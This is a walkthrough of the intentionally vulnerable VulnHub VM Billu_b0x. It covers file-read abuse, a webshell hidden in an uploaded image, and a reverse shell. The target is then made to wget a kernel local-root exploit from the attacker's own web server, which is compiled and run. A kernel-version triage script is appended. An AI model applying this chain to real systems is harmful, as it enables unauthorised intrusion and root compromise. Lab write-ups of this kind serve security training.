VulnHub box: Billu_b0x
Emmm, it's been a while since I played with a boot2root VM, so time to do one today!!
Open the VM in VMware, set its network adapter to NAT, then boot Kali and the target
First check Kali's own IP address, then use nmap to sweep the subnet for live hosts: nmap -sP 192.168.80.0/24
(-sP is the old name for the -sn ping scan: host discovery only, no port scan)
That finds the target's IP address; next, a full port scan with service detection
nmap command: nmap -p 1-65535 -sV 192.168.80.129
Only two ports are open!! Leave 22 alone for now and go straight to port 80:
The landing page has a hint about SQL injection??? Tried logging in with the usual universal-password payloads (the ' or 1=1 style) and they all failed...
Park it for now and come back if nothing else pans out. Information gathering first!!
Brute-force directories with DirBuster and dirb at the same time
DirBuster results:
Dir found: /cgi-bin/ - 403
File found: /index.php - 200
Dir found: /icons/ - 403
File found: /c.php - 200
File found: /in.php - 200
File found: /show.php - 200
Dir found: /doc/ - 403
File found: /add.php - 200
File found: /test.php - 200
Dir found: /icons/small/ - 403
File found: /head.php - 200
Dir found: /uploaded_images/ - 200
File found: /uploaded_images/c.JPG - 200
File found: /uploaded_images/CaptBarbossa.JPG - 200
File found: /panel.php - 302
File found: /head2.php - 200
Dir found: /server-status/ - 403
dirb results:
---- Scanning URL: http://192.168.80.129/ ----
+ http://192.168.80.129/add (CODE:200|SIZE:307)
+ http://192.168.80.129/c (CODE:200|SIZE:1)
+ http://192.168.80.129/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.80.129/head (CODE:200|SIZE:2793)
==> DIRECTORY: http://192.168.80.129/images/
+ http://192.168.80.129/in (CODE:200|SIZE:47554)
+ http://192.168.80.129/index (CODE:200|SIZE:3267)
+ http://192.168.80.129/panel (CODE:302|SIZE:2469)
==> DIRECTORY: http://192.168.80.129/phpmy/
+ http://192.168.80.129/server-status (CODE:403|SIZE:295)
+ http://192.168.80.129/show (CODE:200|SIZE:1)
+ http://192.168.80.129/test (CODE:200|SIZE:72)
==> DIRECTORY: http://192.168.80.129/uploaded_images/
+ http://192.168.80.129/phpmy/ChangeLog (CODE:200|SIZE:28878)
+ http://192.168.80.129/phpmy/LICENSE (CODE:200|SIZE:18011)
+ http://192.168.80.129/phpmy/README (CODE:200|SIZE:2164)
+ http://192.168.80.129/phpmy/TODO (CODE:200|SIZE:190)
+ http://192.168.80.129/phpmy/changelog (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/contrib/
+ http://192.168.80.129/phpmy/docs (CODE:200|SIZE:2781)
+ http://192.168.80.129/phpmy/export (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/favicon (CODE:200|SIZE:18902)
+ http://192.168.80.129/phpmy/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.80.129/phpmy/import (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/index (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/js/
==> DIRECTORY: http://192.168.80.129/phpmy/libraries/
+ http://192.168.80.129/phpmy/license (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/locale/
+ http://192.168.80.129/phpmy/main (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/navigation (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/phpinfo (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/phpmyadmin (CODE:200|SIZE:42380)
==> DIRECTORY: http://192.168.80.129/phpmy/pmd/
+ http://192.168.80.129/phpmy/print (CODE:200|SIZE:1064)
+ http://192.168.80.129/phpmy/robots (CODE:200|SIZE:26)
+ http://192.168.80.129/phpmy/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.80.129/phpmy/scripts/
==> DIRECTORY: http://192.168.80.129/phpmy/setup/
+ http://192.168.80.129/phpmy/sql (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/themes/
+ http://192.168.80.129/phpmy/url (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/webapp (CODE:200|SIZE:6917)
+ http://192.168.80.129/phpmy/setup/config (CODE:303|SIZE:0)
==> DIRECTORY: http://192.168.80.129/phpmy/setup/frames/
+ http://192.168.80.129/phpmy/setup/index (CODE:200|SIZE:12970)
==> DIRECTORY: http://192.168.80.129/phpmy/setup/lib/
+ http://192.168.80.129/phpmy/setup/scripts (CODE:200|SIZE:5169)
+ http://192.168.80.129/phpmy/setup/styles (CODE:200|SIZE:6941)
+ http://192.168.80.129/phpmy/setup/validate (CODE:200|SIZE:10)
-----------------
END_TIME: Mon Nov 11 04:50:43 2019
Plenty of suspicious paths turned up!
Visit the phpmy directory first to see whether it is a phpMyAdmin install:
It is. Set it aside and go through the other pages one by one. c.php first: blank page
in.php is phpinfo() (useful in itself: DOCUMENT_ROOT in there gives the web root for any absolute paths later), and it also suggests there is a file inclusion vulnerability somewhere:
show.php shows nothing, blank page; add.php looks like a file upload page:
test.php gives a hint!!!
A file parameter??? That lines up with the file inclusion suspicion. Passing it as a GET parameter does nothing; guessed it must be POST, and that works:
Good, so this can be used to read other files. Since the response is the raw file content (which is what lets us read PHP source instead of having it executed), it is effectively an arbitrary file read:
c.php, show.php, in.php, index.php, add.php, head.php, panel.php
Remembering there is also phpMyAdmin, read its configuration file first (phpMyAdmin keeps the database login in config.inc.php under its install directory, here phpmy) to see whether it holds a usable account and password:
Something that looks like credentials, and for root at that? Tried them on phpMyAdmin: failed. Tried SSH with the same pair instead; after all, it says root
Unexpectedly, it logged straight in:
Box done???? Let's carry on anyway; phpMyAdmin still hasn't been cracked
show.php, on inspection, looks like it runs a database query??:
c.php contains a username and password; note them down: billu with password b0x_billu
Finish going through the pages first, then try them on phpMyAdmin, to save effort:
add.php is just a static page; there is no real upload behind it...
panel.php looks like the page you land on after logging in from the front page; set it aside for now:
The two head pages just render images. After going through all of them there is a decent amount of information
Most useful are the username and password from c.php; try them as the phpMyAdmin login
Tried; login succeeds:
A quick look through the database turns up another username and password: biLLu with password hEx_it:
Recall that the front page needed a login; guess that this is the web account. Tried it: success:
The add-user page has an upload field!!
Check the upload handling in the source first; it is vulnerable:
From the source it is clear: upload an image with PHP appended, then get it executed through the file inclusion!!
Bypass the file header check by keeping a valid image header and appending a one-line webshell after it:
It executes:
That makes it easy: an image that executes PHP is basically the same setup as the previous box??
Go straight for a PHP reverse shell script!
Shell obtained:
Upgrade to a proper TTY with python: python -c 'import pty; pty.spawn("/bin/bash")'
Check the kernel:
Emmm, Ubuntu again, and a 2014 kernel... Dirty COW again??
Dirty COW didn't work; the VM just crashed?? Or did I not wait long enough?? Never mind, switch approach
Check the exact release with cat /etc/issue:
Search for an exploit matching that release directly (the hit is 37292.c, the overlayfs local root for Ubuntu 3.13 kernels, CVE-2015-1328):
The current directory isn't writable, so switch to /tmp. On Kali, start a web server and copy the exploit into the web root:
vim /etc/apache2/ports.conf   (change Listen to 8888, the port used in the wget below)
/etc/init.d/apache2 start
cp /usr/share/exploitdb/exploits/linux/local/37292.c /var/www/html
Download it on the target: wget 192.168.80.128:8888/37292.c
Compile and run:
gcc -pthread 37292.c -o 37292 -lcrypt
./37292
Root obtained; box done!! Exactly the same result as the earlier SSH login...
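Added example (mine, not part of the original write-up) for the lesson in this section: triage kernel local-root candidates by version before compiling anything, and rank them by reliability. The version windows are upstream and Exploit-DB facts: 37292 (overlayfs, CVE-2015-1328, the exploit used above) is listed for Ubuntu kernels 3.13.0 up to but not including 3.19; Dirty COW (CVE-2016-5195, EDB 40839) was introduced in 2.6.22 and fixed upstream in 4.4.26, 4.7.9 and 4.8.3. Distros backport fixes, so a match here is a candidate to confirm against the distro's package changelog (cat /etc/issue gives the release, uname -r the kernel build), not a guarantee.

```python
"""Triage kernel LPE candidates by version before compiling anything.

Added example for this write-up, not part of the original post. Version ranges
are upstream/Exploit-DB facts: 37292 (overlayfs, CVE-2015-1328, the exploit used
above) is titled for Ubuntu kernels 3.13.0 up to but not including 3.19; Dirty COW
(CVE-2016-5195, EDB 40839) was introduced in 2.6.22 and fixed upstream in 4.4.26,
4.7.9 and 4.8.3. Distros backport fixes, so a match is a candidate to confirm
against the distro changelog, not a guarantee.
"""
import platform
import re
import sys

# (name, EDB id, [(min_inclusive, max_exclusive), ...], reliability note)
CANDIDATES = [
    ("overlayfs (CVE-2015-1328)", 37292,
     [((3, 13, 0), (3, 19, 0))],
     "Ubuntu only; deterministic, no race to win"),
    ("Dirty COW (CVE-2016-5195)", 40839,
     [((2, 6, 22), (4, 4, 26)), ((4, 5, 0), (4, 7, 9)), ((4, 8, 0), (4, 8, 3))],
     "race condition; can hang or crash the box, as it did above"),
]


def parse_kernel(uname_r: str) -> tuple:
    """'3.13.0-32-generic' -> (3, 13, 0); a missing patch level counts as 0."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", uname_r)
    if not m:
        raise ValueError("unrecognised kernel string: " + repr(uname_r))
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def candidates_for(uname_r: str) -> list:
    """Return [(name, edb_id, note)] for every exploit whose version window
    contains this kernel, in table order."""
    ver = parse_kernel(uname_r)
    return [(name, edb, note)
            for name, edb, ranges, note in CANDIDATES
            if any(lo <= ver < hi for lo, hi in ranges)]


if __name__ == "__main__":
    release = sys.argv[1] if len(sys.argv) > 1 else platform.release()
    print("kernel:", release)
    for name, edb, note in candidates_for(release):
        print(f"  EDB-{edb}  {name}: {note}")
```

For a 3.13.0 Ubuntu kernel both rows match on version alone, which is the situation above: the race-based exploit crashed the VM, the deterministic overlayfs one worked first time. Try the deterministic candidate first and keep the race-based ones for when nothing else fits.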
No flag to be found, apparently. Bye~~
Summary
Overall this box was much like the previous one: file inclusion, then a reverse shell
The main takeaway is on privilege escalation: switch methods rather than sticking with one that isn't working. When Dirty COW fails,
think of something else, such as looking up exploits for that exact Ubuntu kernel version!!
All in all, learned a lot from this one~~ Keep it up!!!!